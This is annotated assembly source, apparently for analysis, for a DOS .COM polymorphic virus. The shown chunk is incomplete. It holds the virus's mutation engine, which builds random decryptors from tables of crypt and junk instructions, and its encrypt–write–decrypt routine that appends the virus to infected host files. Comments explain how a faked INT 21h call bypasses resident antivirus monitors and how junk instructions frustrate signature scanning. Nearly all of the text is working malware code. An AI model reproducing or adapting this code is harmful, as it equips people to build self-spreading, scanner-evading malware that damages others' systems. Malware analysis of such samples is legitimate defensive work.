; manzon.asm -- DOS .COM polymorphic virus source (MASM/TASM syntax, 16-bit
; real mode, .386 instruction set enabled).  Listed here for analysis only.
; NOTE(review): this chunk is incomplete.  StartDecryptSimple, InstallVirus,
; EncryptDecryptSimple, DEcSI, entry_p, IPOffs, File_H, DSRan, CCode1, CCode2,
; InitCX1, InitSI1, ED_buf, filecodeend and code_end are referenced below but
; are not visible in this view.
.model tiny
.code
.386
code_size equ code_end-code_start ; total image size (code_end is outside this chunk)
filecodelength equ filecodeend-code_start ; byte count that gets encrypted and written (used by ED below)
org 100h ; .COM image: loaded at CS:0100h, PSP in the 256 bytes below
code_start:
start:
call StartDecryptSimple ; outer XOR layer is removed before anything else executes (routine not in view)
SimpleCryptStart: ; everything from here on is inside the outer layer
call InstallVirus ; residency/install routine, not in view
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+
;+ Following code randomly creates an encryptor and a matching :+
;+ decryptor. :+
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+
;-----------------------------------------------------------------------
; WriteVirus -- polymorphic decryptor generator ("morpher").
; In:  BX = DOS file handle of the host being infected (saved on entry, used
;      for the INT 21h/AH=40h write at the end).
;      DS = CS assumed; ES is forced to CS at CreateCode.
; Out: a freshly generated decryptor (InitCX1, InitSI1, CCode1, SI-adjust,
;      LOOP) has been written to the host file; CLength = byte length of the
;      random crypt-instruction sequence; the matching encryptor is in CCode2;
;      File_H = handle; then the relocated ED routine is called to encrypt,
;      write and restore the body.
; Clobbers: AX BX CX DX SI DI ES, flags; DF is left clear.
; NOTE(review): the final write assumes InitCX1, InitSI1 and CCode1 are
; contiguous in that order (CLength+12 bytes are written starting at InitCX1)
; -- confirm against the data section, which is not in this chunk.
; Entropy: every "random" value is IN AX,40h, i.e. the 8253/8254 PIT counter
; latch, stirred with fixed XOR/ROL constants.  This is not a CSPRNG; samples
; taken close together in time are strongly correlated.
;-----------------------------------------------------------------------
WriteVirus:
push bx ; Save filehandle
in ax,40h ; Get random (PIT counter bytes, see header)
;+:+:+:+:+:+:+Create random values to use in instructions+:+:+:+:+:+:+:
; Fill the five imm8 slots (Rand1a..Rand5a in DECode, Rand1b..Rand5b in
; ENCode) with the SAME byte per slot, so each decryptor op and its inverse
; in the encryptor carry an identical operand.  Stride 4 = table entry size.
mov si,offset Rand1a ; First random in decryptor OP-codes
mov di,offset Rand1b ; First random in encryptor OP-codes
mov cx,5 ; 5 slots to patch (original comment said "7*2"; only Rand1..Rand5 exist in the tables)
SetRandom:
mov [si],al
mov [di],al
add si,4 ; Next OP-code
add di,4 ; -----"-----
xor ax, 'P'-'O'-'O'-'R' ; Generate... (character arithmetic folds to a constant:
rol ax,5 ; ..new...      a fixed XOR/ROL/XOR stir of the PIT value)
xor ax,'R'-'E'-'B'-'O'-'U'-'N'-'D' ; random
loop SetRandom
;+:+:+:+:+:+: Copy instructions from ENCode and DECode :+:+:+:+:+:+:+:
; Build loop.  Each pass APPENDS one 4-byte DECode entry to the decryptor
; (CCode1 grows forward) and PREPENDS the matching ENCode entry to the
; encryptor (CCode2 is shifted up by one slot first), so the encryptor
; applies the inverse operations in reverse order.
CreateCode:
push cs
pop es ; ES = CS for the string moves below
mov cx,13 ;Counter, max 13 sequences (the sequence ends up with 1..13 instructions)
mov di,offset CCode1 ; DI = append point in the decryptor
mov si,offset DECode
mov word ptr ds:[CLength],0h ;Length of decryptor
CreateLoop:
mov si,offset DECode
in ax,40h ; Get random (PIT counter again)
ror ax,cl
xor ax,'I'-'M'-'M'-'O'-'R'-'T'-'A'-'L'
sub ax, 'R'-'I'-'O'-'T'
push ax ;Save for later use (stop decision at the bottom of the loop)
mov bl,al
and bl,15 ;Mask only 0-15 -> index into the 16-entry DECode table
shl bl,2 ;mul 4 to get right offset (4-byte entries)
xor bh,bh
add si,bx ;Get right OP-code
movsd ;move one inst (4 bytes) into CCode1; DI advances
std ;count backwards
push cx
push di ;Move code in CCode one inst
push si ;forward, so next inst could
mov si,offset CCode2+13*4 ;be first.  (shift CCode2 up by one slot, slots 13..0 -> 14..1)
mov di,offset CCode2+14*4
mov cx,14
rep movsd
pop si
mov di,offset CCode2 ; DI = first slot of the encryptor
cld
; BL = index*4.  Indices 0..7 (BL 0..28) are real crypt ops with an inverse
; in ENCode; indices 8..15 (BL >= 32) are filler, copied verbatim to both.
cmp bl,29 ;Should we use alt. encrypt?
jnb short Garbage ;No, just garbage-instructions
add si,ENCode-DECode-4 ;Get right pos in ENCode (SI was already stepped past the DECode entry)
movsd ;move one inst (4 bytes)
sub si,ENCode-DECode ;Back to old pos in DECode
jmp short NoGarbage
Garbage:
sub si,4 ;Same instructions again (filler must leave CX/SI untouched -- see DECode table)
movsd
NoGarbage:
pop di
pop cx
add word ptr ds:[CLength],4 ;Add length of decryptor
pop ax ;Get random value again
and ax,128+64 ;Leave de/encryptor like this? (bits 6 and 7 both clear -> stop; 1-in-4 per iteration)
jz short QuitLoop
loop CreateLoop
QuitLoop:
;+:+:+: Build the first instruction in decryptor (mov cx,??) :+:+:+:+:
xor ax,ax
in al,40h ; Another random (PIT counter low byte)
xor al,'A'
and al,7 ;Random between 0 and 7
mov byte ptr ds:[InitCX1],0b9h ;OP-Code for mov cx,imm16 (B9h)
mov bx,filecodelength
add bx,ax ; loop count = filecodelength + 0..7, so the decryptor may run up to 7 bytes past the body into the padding
mov word ptr ds:[InitCX1+1],bx ;Value to put in CX (counter)
;+:+:+: Build to second instruction (mov si, offset codestart) :+:+:+:+:
mov byte ptr ds:[InitSI1],0beh ;OP-Code for mov si,imm16 (BEh)
mov ax,[entry_p] ;EntryPoint (entry_p not in view)
add ax,word ptr ds:[CLength] ;Length of cryptlines
add ax,15 ;size of rest of loop -- 3+3 (mov cx/mov si) + 4 (SI-adjust) + 2 (LOOP) = 12; the extra 3 bytes are not explained in this chunk, TODO confirm
add ax,[IPOffs] ;Then add 100h (IPOffs not in view)
NoCom: mov word ptr ds:[InitSI1+1],ax ;Value to put in SI = start of the encrypted body (label NoCom is unreferenced in this chunk)
;+:+:+: Build the instruction that increase SI :+:+:+:+:
; BX still holds the CX initializer computed above; bit 1 of its low byte
; selects one of two 4-byte SI-adjust variants from DEcSI (table not in view).
and bl,2 ; Get random for inc si
shl bl,2 ; mul 4
mov bh,0
mov si,offset DEcSI
add si,bx ; Get pos in ADD-SI-alts.
movsd ; appended to CCode1 directly after the crypt ops; DI advances
;+:+:+: Build the loop-instruction :+:+:+:+:
; rel8 = 0FFh - CLength - 5 = -(CLength + 6): jumps back over the crypt ops
; (CLength bytes), the 4-byte SI-adjust and the 2-byte LOOP itself.
mov ah,0ffh
sub ah,[CLength] ; Calculate loop operand
sub ah,5
mov al,0e2h ; OP-code for loop
mov [di],ax ; Write loop command (E2 rel8)
;+:+:+: Write RET at end of encryptionroutine :+:+:+:+:
; CCode2 is CALLed once per byte by the ED routine, so it must end in RET.
mov di,offset CCode2 ; Encryptionroutine
add di,word ptr ds:[Clength] ; Find end of ER (Clength/CLength: assembler is case-insensitive here)
mov byte ptr ds:[di],0c3h ; Write a RET
;+:+:+: Write created loader to file :+:+:+:+:
pop bx ; Get filehandle
mov ah,40h ; Function WRITE
mov cx,word ptr ds:[CLength]
add cx,12 ; 3 (mov cx) + 3 (mov si) + CLength + 4 (SI-adjust) + 2 (LOOP)
mov dx,offset InitCX1
int 21h ; Write decryptor to file.  Plain INT 21h: this write DOES pass through any
;        hooked handler, unlike the body write in ED which jumps to OldInt directly.
;        CF/AX are never checked, so a short or failed write is silently ignored.
mov word ptr ds:[File_H],bx
;+:+:+:+: Change decryptor so code could use it (put ret instead of inc)
; Overwrite the first byte of the SI-adjust in CCode1 with RET so that CCode1
; becomes a per-byte callable decryptor (the file copy was already written).
mov di,offset CCode1 ; Encryptionroutine
add di,word ptr ds:[Clength] ; Find end of ER
mov byte ptr ds:[di],0c3h ; Write a RET
;+:+:+:+: Copy enc&dec-call-routine to end of virus :+:+:+:+:
mov si,offset ED_start ; Start of ED-routine
mov di,offset ED_buf ; buffer beyond virus (ED_buf not in view)
mov cx,ED_End-ED_start ; Size of ED-routine
rep movsb
call filecodeend ; Call copy -- implies ED_buf == filecodeend; cannot be verified from this chunk
ret
;------ Routine to Encrypt virus, write virus, and decrypt virus
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+
;+ Following code will be copied to memory beyond the virus, :+
;+ and then called. The routine then calls the created :+
;+ encryptor, writing the encrypted virus to the file and :+
;+ then uses the modified decryptor to decrypt the virus again. :+
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+
;-----------------------------------------------------------------------
; ED_start..ED_End -- relocatable encrypt / write / decrypt stub.
; WriteVirus copies this range to ED_buf (beyond the virus body) and calls it
; there, because it transforms the body in place and must not sit inside the
; bytes it modifies.  Calls into the body use `mov ax,offset X / call ax`
; (absolute targets) instead of relative CALLs, which would break after the
; copy; the one relative CALL (DoOldInt) targets code inside the copied range.
; In:  DS = CS; File_H = handle of the host file; CCode1/CCode2 prepared by
;      WriteVirus; OldInt = original INT 21h vector (set elsewhere, not in view).
; Out: encrypted body plus 0..15 padding bytes appended to the host; body
;      restored in memory; CLength increased by the padding length.
; Clobbers: AX BX CX DX SI DI, flags; DS is changed and restored before RET.
;-----------------------------------------------------------------------
ED_start:
;+:+:+: Create RandomValue for simple enc/decryptor +:+:+:+
in al,40h ; PIT counter low byte = key of the simple (outer) layer
mov byte ptr cs:[DSRan],al ; DSRan not in this chunk
;+:+:+: Encrypt virus, using simple encryptor :+:+:+:+
mov ax,offset EncryptDecryptSimple
call ax ; absolute call (relocation-safe); routine not in view
;+:+:+: Encrypt virus, using created encryptor :+:+:+:+
; Inner layer: run the generated encryptor over every body byte in place.
; CCode2 operates on cs:[si] and was terminated with RET by WriteVirus.
mov si,0100h ; Start of viruscode
mov cx,filecodelength
encloop:
mov ax,offset CCode2 ; offset to created enc-routine
call ax ; call it
inc si
loop encloop ; Encrypt whole virus
;+:+:+: Write encrypted virus to file :+:+:+:+
mov bx,word ptr ds:[File_H] ; Get filehandle
mov ah,40h ; Function WRITE
mov cx,filecodelength
mov dx,0100h
; Emulate INT 21h without an INT instruction: push FLAGS and CS, then CALL
; (pushes IP) into a far JMP to the ORIGINAL vector.  A hooked INT 21h
; (resident monitor / behaviour blocker) never sees this write.
pushf
push cs ; Fake interrupt call
call DoOldInt
;+:+:+: Decrypt virus, using created encryptor :+:+:+:+
; Undo the two layers in reverse order: generated decryptor first (CCode1,
; RET-patched by WriteVirus), then the simple layer.
mov si,0100h ; Start of viruscode
mov cx,filecodelength
decloop:
mov ax,offset CCode1
call ax ; Call builded encryptroutine
inc si
loop decloop
;+:+:+: Decrypt virus, using simple decryptor :+:+:+:+
mov ax,offset EncryptDecryptSimple
call ax
;+:+:+: Write random number of extra bytes to file (0-15) :+:+:+:+
; The 0..15 padding bytes are read from DS:0000 with DS set to the raw PIT
; value, i.e. an arbitrary segment: whatever happens to be in memory there is
; appended to the host.  This leaks host/system memory into the infected file
; and is a per-infection forensic artefact.
mov bx,word ptr ds:[File_H] ; Get filehandle (read before DS is changed)
in ax,40h ; Get random in al (AX = PIT counter bytes from ports 40h/41h)
mov ds,ax ; Read from random segment
and ax,0fh ; mask bit 0-3
mov cx,ax ; No. bytes to write
mov ah,40h
add word ptr cs:[CLength],cx ; add length (must know this when creating EXE-header); cs: override because DS != CS here
xor dx,dx ; DS:0000 = source buffer
pushf
push cs ; Fake interrupt call (same hook bypass as above)
call DoOldInt
push cs ; Push back codeseg in DS
pop ds
ret
; DoOldInt -- INT-style far transfer to the saved original INT 21h handler.
; Entered with FLAGS, CS and IP already on the stack, so the handler's IRET
; returns to the instruction after `call DoOldInt`.  `db 0EAh` + `dd` =
; JMP FAR ptr16:16 whose immediate target (OldInt) is patched at install
; time (patching code not in view).  STI: a real INT would clear IF; here
; the original handler runs with interrupts enabled.
DoOldInt:
sti
db 0eah
OldInt dd 0
ED_End:
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+
;+ Following table contains 16 different 4-byte code sequences, :+
;+ randomly used by the decryption routine. The first 8 affect :+
;+ the decryption algorithm, and have a matching 4-byte inst- :+
;+ ruction in the ENCode-table. The rest are just garbage :+
;+ instructions, used to make scanning harder. The morpher :+
;+ will pick a random number (1-13, see the counter at CreateCode) :+
;+ of these instructions, and build the decryption routine. :+
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+
;-----------------------------------------------------------------------
; DECode -- 16 candidate 4-byte decryptor instructions (index = random & 15).
; Entries 0..7 transform the byte at cs:[si] and have an inverse at the same
; index in ENCode (the ENCode rows for dec/inc/neg lie beyond this chunk).
; Entries 8..15 are filler: they may clobber AX/BX/DI and flags but leave CX
; and SI intact, which the generated LOOP depends on.
; Rand1a..Rand5a are imm8 slots patched by WriteVirus:SetRandom.
; Analyst note: every real op begins with the 2Eh (CS:) prefix followed by
; 80h/C0h/FEh/F6h and a [si] ModRM (04/0C/2C/34/1C), always at a 4-byte stride.
;-----------------------------------------------------------------------
DECode db 02eh,080h,004h ; 0: add byte ptr cs:[si],imm8
Rand1a db ?
db 02eh,080h,02ch ; 1: sub byte ptr cs:[si],imm8
Rand2a db ?
db 02eh,080h,034h ; 2: xor byte ptr cs:[si],imm8 (self-inverse)
Rand3a db ?
db 02eh,0C0h,004h ; 3: rol byte ptr cs:[si],imm8 (C0 /0 -- 80186+ encoding)
Rand4a db ?
db 02eh,0C0h,00Ch ; 4: ror byte ptr cs:[si],imm8
Rand5a db ?
db 02eh,0feh,00ch,090h ; 5: dec byte ptr cs:[si]; nop
db 02eh,0feh,004h,090h ; 6: inc byte ptr cs:[si]; nop
db 02eh,0f6h,01ch,090h ; 7: neg byte ptr cs:[si]; nop (self-inverse)
;------- Entries 8..15: filler with no effect on the data, present only to vary the decryptor's byte pattern
db 053h,08bh,0dch,05bh ; 8: push bx; mov bx,sp; pop bx
db 093h,043h,090h,043h ; 9: xchg ax,bx; inc bx; nop; inc bx
db 040h,08ah,0c4h,048h ; 10: inc ax; mov al,ah; dec ax
db 08ch,0c8h,056h,05fh ; 11: mov ax,cs; push si; pop di
db 074h,000h,075h,000h ; 12: je $+2; jne $+2 (both fall through)
db 08Bh,0c3h,02bh,0d8h ; 13: mov ax,bx; sub bx,ax  (2B D8 decodes as SUB BX,AX, not "sub ax,bx" as originally commented; leaves BX = 0)
db 003h,0feh,02ch,002h ; 14: add di,si; sub al,2
db 0ebh,001h,0b4h,090h ; 15: jmp short $+3 (skips the B4h byte); nop
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+
;+ Following table contains the encryption versions of the :+
;+ first 8 instructions in the DECode-table, at the same index. :+
;+ SUB will be ADD, ROR will be ROL etc. :+
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+
ENCode db 02eh,080h,02ch ; sub byte ptr cs:[si],?
Rand1b db ?
db 02eh,080h,004h ; add byte ptr cs:[si],?
Rand2b db ?
db 02eh,080h,034h ; xor byte ptr cs:[si],?
Rand3b db ?
db 02eh,0C0h,00Ch ; ror byte ptr cs:[si],?
Rand4b db ?
db 02eh,0C0h,004h ; rol byte ptr cs:[si],?